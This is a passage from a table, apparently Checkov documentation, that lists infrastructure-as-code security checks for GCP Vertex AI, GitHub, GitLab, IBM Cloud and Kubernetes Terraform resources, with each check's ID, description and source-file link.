[GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) | -| 1789 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) | -| 1790 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) | -| 1791 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) | -| 1792 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) | -| 1793 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) | -| 1794 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) | -| 1795 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) | -| 1796 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 1797 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 1798 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 1799 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 1800 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 1801 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 1802 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 1803 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) | -| 1804 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) | -| 1805 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) | -| 1806 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) | -| 1807 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) | -| 1808 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) | -| 1809 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | -| 1810 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | -| 1811 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | -| 1812 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | -| 1813 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) | -| 1814 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | -| 1815 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | -| 1816 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | -| 1817 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | -| 1818 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | -| 1819 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | -| 1820 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | -| 1821 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | -| 1822 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1823 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1824 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1825 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1826 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1827 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1828 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1829 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1830 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1831 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1832 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1833 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1834 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1835 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1836 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1837 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1838 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1839 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1840 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1841 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1842 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1843 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1844 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1845 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1846 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1847 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1848 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1849 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1850 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1851 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1852 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1853 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1854 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1855 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1856 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1857 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1858 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1859 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1860 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1861 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1862 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1863 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1864 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1865 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1866 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1867 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1868 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1869 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1870 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1871 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1872 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1873 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1874 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1875 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1876 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1877 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1878 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1879 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1880 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1881 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1882 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1883 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1884 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1885 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1886 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1887 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1888 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1889 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1890 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1891 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1892 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1893 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1894 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1895 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1896 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1897 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1898 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1899 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1900 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 1901 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 1902 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 1903 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 1904 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) | -| 1905 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 1906 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 1907 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 1908 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | 